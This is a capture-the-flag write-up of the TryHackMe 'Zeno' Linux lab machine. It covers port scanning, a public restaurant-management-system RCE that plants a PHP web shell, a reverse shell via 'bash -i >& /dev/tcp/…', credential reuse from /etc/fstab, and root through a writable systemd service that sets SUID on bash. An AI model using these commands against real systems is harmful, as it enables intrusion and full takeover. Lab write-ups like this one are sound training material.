Zeno - wook413

#tryhackme #linux #medium ![[Pasted image 20250704152555.png]] --- # Information Gathering - Nmap A TCP port scanning against all ports revealed only 2 open ports: 22 and 12340. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 12:29 CDT Nmap scan report for 10.10.19.28 Host is up (0.13s latency). Not shown: 65482 filtered tcp ports (no-response), 51 filtered tcp ports (host-prohibited) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 12340/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 43.97 seconds ``` Ran a more detailed TCP scan against those two ports with options `-sC` and `-sV` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sC -sV $IP -p 22,12340 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 12:31 CDT Nmap scan report for 10.10.19.28 Host is up (0.13s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA) | 256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA) |_ 256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (ED25519) 12340/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-title: We've got some trouble | 404 - Resource not found |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 | http-methods: |_ Potentially risky methods: TRACE Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.97 seconds ``` and finally a UDP scan against top 1,000 ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 12:32 CDT Nmap scan report for 10.10.19.28 Host is up (0.13s latency). Not shown: 996 open|filtered udp ports (no-response) PORT STATE SERVICE 69/udp filtered tftp 24854/udp filtered unknown 49176/udp filtered unknown 49193/udp filtered unknown Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds ``` --- # Footprinting We found two open ports: 22 and 12340. Port 22 is usually not that useful in the enumeration phase especially without any credentials. Let's look at the port 12340 which appears to host a web service. This is the landing page. It's trying to convince us it has no juicy information stored here. Let's keep looking to see if that's really the case. ![[Pasted image 20250704123525.png]] ##### gobuster Couldn't enumerate anything useful from the landing page so I ran `gobuster` to enumerate directories. I found `/rms`. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ gobuster dir -u http://$IP:12340 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.19.28:12340 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /rms (Status: 301) [Size: 237] [--> http://10.10.19.28:12340/rms/] ``` This is the landing page of `/rms`. It says "WELCOME TO PATHFINDER HOTEL **RESTAURANT MANAGEMENT SYSTEM**".`rms` most likely stands for restaurant management system. I guess it's similar to CMS? ![[Pasted image 20250704124615.png]] # Exploit I searched `Searchsploit` for `restaurant management system` with a bit of skepticism, wondering if anything would turn up and exploits actually existed in the database! ![[Pasted image 20250704132108.png]] I downloaded the RCE exploit and got rid of the `proxies` variable because we don't need it. ![[Pasted image 20250704134108.png]] I successfully ran the exploit and at the bottom it tells me shell is successfully uploaded and I should check the URL `/rms/images/reverse-shell.php` ![[Pasted image 20250704134302.png]] Confirmed that payload is working properly. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ curl $IP:12340/rms/images/reverse-shell.php?cmd=id uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0 ``` I encoded the following reverse shell one liner payload `bash -c "bash -i >& /dev/tcp/10.23.133.183/1234 0>&1"` to get a real reverse shell. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ curl $IP:12340/rms/images/reverse-shell.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.23.133.183%2F1234%200%3E%261%22 ``` and I did! ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.23.133.183] from (UNKNOWN) [10.10.19.28] 38074 bash: no job control in this shell bash-4.2$ whoami whoami apache bash-4.2$ ``` # Lateral Movement After trying to enumerate some juicy information for a while, I landed in `/etc/fstab` where I found an interesting mount plus a set of credentials. ![[Pasted image 20250704142748.png]] ```bash #//10.10.10.10/secret-share /mnt/secret-share cifs _netdev,vers=3.0,ro,username=zeno,password=FrobjoodAdkoonceanJa,domain=localdomain,soft 0 0 ``` I re-used the found credentials against the SSH server and It let me in! ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ ssh edward@$IP The authenticity of host '10.10.153.102 (10.10.153.102)' can't be established. ED25519 key fingerprint is SHA256:rRttffFIyZasFZ3kH1UCuXbqoQKD5nKQWgtEudn7nys. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.153.102' (ED25519) to the list of known hosts. [email protected]'s password: Last login: Tue Sep 21 22:37:30 2021 [edward@zeno ~]$ whoami edward ``` Found `user.txt` ```bash [edward@zeno ~]$ cd /home/edward [edward@zeno ~]$ ls user.txt [edward@zeno ~]$ cat user.txt THM{07... ``` # Privilege Escalation `sudo -l` reveals that edward can run `/usr/sbin/reboot` binary without password. It turned out it's a symbolic link to `/bin/systemctl`. In this case, if we run `sudo /usr/sbin/reboot` it will run `/bin/systemctl` which triggers reboot. In other words, it will just reboot the system. This is not enough for us to perform privesc yet. ```bash [edward@zeno ~]$ sudo -l Matching Defaults entries for edward on zeno: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User edward may run the following commands on zeno: (ALL) NOPASSWD: /usr/sbin/reboot ``` ```bash [edward@zeno ~]$ ls -l /usr/sbin/reboot lrwxrwxrwx. 1 root root 16 Jul 26 2021 /usr/sbin/reboot -> ../bin/systemctl ``` I found a writable file named `zeno-monitoring.service`. The owner of the file is `root` but every user has permission to read and write the file. It appears that `ExecStart` parameters takes a command value and it starts the command on boot. ```bash [edward@zeno ~]$ find / -type f -writable 2>/dev/null /etc/systemd/system/zeno-monitoring.service /var/spool/mail/zeno /var/spool/mail/edward /home/edward/.ssh/authorized_keys ``` ```bash -rw-rw-rw-. 1 root root 144 Jul 4 22:14 /etc/systemd/system/zeno-monitoring.service ``` ```bash [edward@zeno ~]$ cat /etc/systemd/system/zeno-monitoring.service [Unit] Description=Zeno monitoring [Service] Type=simple User=root ExecStart=/root/zeno-monitoring.py [Install] WantedBy=multi-user.target ``` I modified the `ExecStart` parameter as the following: ```bash [edward@zeno ~]$ cat /etc/systemd/system/zeno-monitoring.service [Unit] Description=Zeno monitoring [Service] Type=simple User=root ExecStart=/usr/bin/chmod +s /bin/bash [Install] WantedBy=multi-user.target ``` Then I rebooted the system by running `sudo /usr/sbin/reboot` ```bash [edward@zeno ~]$ sudo /usr/sbin/reboot Connection to 10.10.153.102 closed by remote host. Connection to 10.10.153.102 closed. ``` After a few moments, I logged back into SSH as edward and successfully ran `/bin/bash -p` to get a shell as `root`. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ ssh edward@$IP [email protected]'s password: Last login: Fri Jul 4 21:53:29 2025 from ip-10-23-133-183.eu-west-1.compute.internal -bash-4.2$ whoami edward -bash-4.2$ /bin/bash -p bash-4.2# whoami root ``` You can see that SUID bits are set to the binary. ```bash bash-4.2# ls -l /bin/bash -rwsr-sr-x. 1 root root 964536 Apr 1 2020 /bin/bash ``` Found `root.txt`! ```bash bash-4.2# cat root.txt THM{b1... ```